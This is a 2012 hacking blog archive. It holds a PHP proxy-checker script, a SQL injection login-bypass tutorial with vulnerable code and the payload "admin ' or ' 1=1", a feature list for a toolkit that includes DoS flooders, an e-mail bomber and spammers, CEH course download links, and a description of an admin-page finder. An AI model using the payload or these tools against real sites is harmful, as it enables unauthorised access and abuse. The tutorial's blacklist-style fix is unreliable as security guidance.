Pages

Friday, August 31, 2012

[PHP]Multithreaded Proxy Checker


<?php
set_time_limit(0);
/***********************************************
* Multithreaded Proxy Checker
* Coded by Miyachung
* Janissaries.Org
* Miyachung@hotmail.com
------------------------------------------------
* Demonstration -> http://www.youtube.com/watch?v=4icPZHv3W9g
* Type list like IP:PORT in a file***********************************************/
/*-----------------------------------------------------------------------*/
    echo "\n[+]Enter your proxy list: ";
    $proxy_list = fgets(STDIN);
    $proxy_list = str_replace("\r\n","",$proxy_list);
    $proxy_list = trim($proxy_list);

    echo "[+]Enter number of thread: ";
    $thread = fgets(STDIN);
    $thread = str_replace("\r\n","",$thread);
    $thread = trim($thread);
    echo "[+]Enter timeout sec: ";
    $timeout = fgets(STDIN);
    $timeout = str_replace("\r\n","",$timeout);
    $timeout = trim($timeout);
    echo "[+]Checking proxies\n";
    echo "-------------------------------------------------------\n";
    $open_file    =    file($proxy_list);
    $open_file  =    preg_replace("#\r\n#si","",$open_file);

            
    checker($open_file,$thread);
/*-----------------------------------------------------------------------*/
function checker($ips,$thread)
{
    global $timeout;
    
    $multi       = curl_multi_init();
    $ips         = array_chunk($ips,$thread);
    $total       = 0;
    $time1  = time();
            foreach($ips as $ip)
            {
                    for($i=0;$i<=count($ip)-1;$i++)
                    {
                    $curl[$i] = curl_init();
                    curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);
                    curl_setopt($curl[$i],CURLOPT_URL,$ip[$i]);
                    curl_setopt($curl[$i],CURLOPT_TIMEOUT,$timeout);
                    curl_multi_add_handle($multi,$curl[$i]);
                    }
                    
                    do
                    {
                    curl_multi_exec($multi,$active);
                    usleep(11);
                    }while( $active > 0 );
                    
                    foreach($curl as $cid => $cend)
                    {
                            $info = curl_getinfo($cend);
                            curl_multi_remove_handle($multi,$cend);
                            if($info['http_code'] != 0)
                            {
                                    $total++;
                                    echo "[~]Proxy works -> ".$ip[$cid]."\n";
                                    save_file("works.txt",$ip[$cid]);
                            }
                    }
            }
    $time2 = time();
    echo "\n[+]Total working proxies: $total,checking completed\n";
    echo "[+]Elapsed time -> ".($time2-$time1)." seconds\n";
    echo "[+]Coded by miyachung || Janissaries.Org\n";
    echo "-------------------------------------------------------\n";
}
    function save_file($file,$content)
{
    $open = fopen($file,'ab');
    fwrite($open,$content."\r\n");
    fclose($open);
}
?>
credit : uploader

Thursday, August 30, 2012

How to bypass Admin/user login through SQL Injection

- Code snippet from /admin/login.php
 ——————————————————————————————————————————
 $postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)
or die(”
” . mysql_error() . “\n”);
——————————————————————————————————————————
The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :
username : admin ‘ or ‘ 1=1
password : sirgod
We logged in.Why?Look,the code will become
———————————————————————————————————————————
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod’”)
———————————————————————————————————————————
Login bypassed.The username must be an existent username.
How to fix?
Simple way : Don’t allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : – , . ( ) ‘ ” _ + / * 

NetTools 5.0

Posted Image


The Creation

Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista, 7). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.

Contents

1) IP Address Scanner 
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping 
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager 
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer) 
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports) 
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control 
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP) 
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat) 
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker) 
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder 
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console 
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data) 
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis 
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

Screenshotes
http://mabsoft.com/ntscreenshot1.JPG
http://mabsoft.com/ntscreenshot2.JPG
http://mabsoft.com/ntscreenshot3.JPG
http://mabsoft.com/ntscreenshot4.JPG
http://mabsoft.com/ntscreenshot5.JPG
http://mabsoft.com/ntscreenshot6.JPG
http://mabsoft.com/ntscreenshot7.JPG
http://mabsoft.com/ntscreenshot8.JPG
http://mabsoft.com/ntscreenshot9.JPG

Download & also need
[ NEED .NET Framework to run ]
ref:mabsoft.com 

Saturday, August 25, 2012

CEH (Certified Ethical Hacker) Material v7



Included:
Introduction to Ethical Hacking =>   http://www.mediafire.com/?q5reg0lzmdg51jo
Footprinting and Reconnaissance=> http://www.mediafire.com/?rqjmkmaz7nxllk2
Scanning Network             => http://www.mediafire.com/?d14n14j13ze6299
Emuration =>  http://www.mediafire.com/?6ba23wcy1fnhrv1
System Hacking => http://www.mediafire.com/?i8lx1ima9tjvqtw
Trojans and Backdoors =>  http://www.mediafire.com/?b8721m5vxo3bo7h
Viruses and Worms  =>  http://www.mediafire.com/?kart0x77mmsu9bf
Sniffers  =>   http://www.mediafire.com/?9nbk8w2j4j6ogxs
Social Engineering   =>   http://www.mediafire.com/?zcod83ktcd48svb
Denial of Service  =>  http://www.mediafire.com/?tqhlytkt5nbdmtf
Session Hijacking =>   http://www.mediafire.com/?avzm56y3x2xg2a2
Hacking Webserver =>  http://www.mediafire.com/?rf69a1u3928jka2
Hacking Web Applications => http://www.mediafire.com/?n5qsv13g0w2i31i
SQL Injection => http://www.mediafire.com/?4z24rq6c14k86ai
Hacking Wireless Networks =>   http://www.mediafire.com/?a7karxow7m7h4j5
Evading IDS, Firewalls and Honeypots =>   http://www.mediafire.com/?ugm0pl0ez77hte5
Buffer Overflows  =>  http://www.mediafire.com/?32a492x1u25w4dv
Cryptography  => http://www.mediafire.com/?43gpjw72ltiv78j
Penetration Testing   => http://www.mediafire.com/?8cax645b6lag8ix

soruce : http://cyberoot.blogspot.com 

Friday, August 24, 2012

Open Source Admin Page Finder Tool ( Perl Script )

Today many tools are available for found admin pages. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password.  


  Actually finding admin page is nothing but just a directory of a particular website“. 
Admin Finder Script is an open source script which is designed in Perl Language. For use this tool we need to install Active Pearl on our machine.

The things you need 

 Download Active Perl
 Download Admin Finder Perl Script
                            
After install Perl for launching the Admin Finder Perl Script we have to use the command prompt.  For launching this application just go to the path directory of our Perl and type the name of the exploit.
                                                   Here our script is working now just fill in the name of the site whose admin page we want to find for the further security assessments. And in the page type just type ‘any’ for the language input.
 
 In the image below we can see that it’s finding the admin page in website by matching the page name with its Pre-built database




 

source : http://www.invisiblehackers.in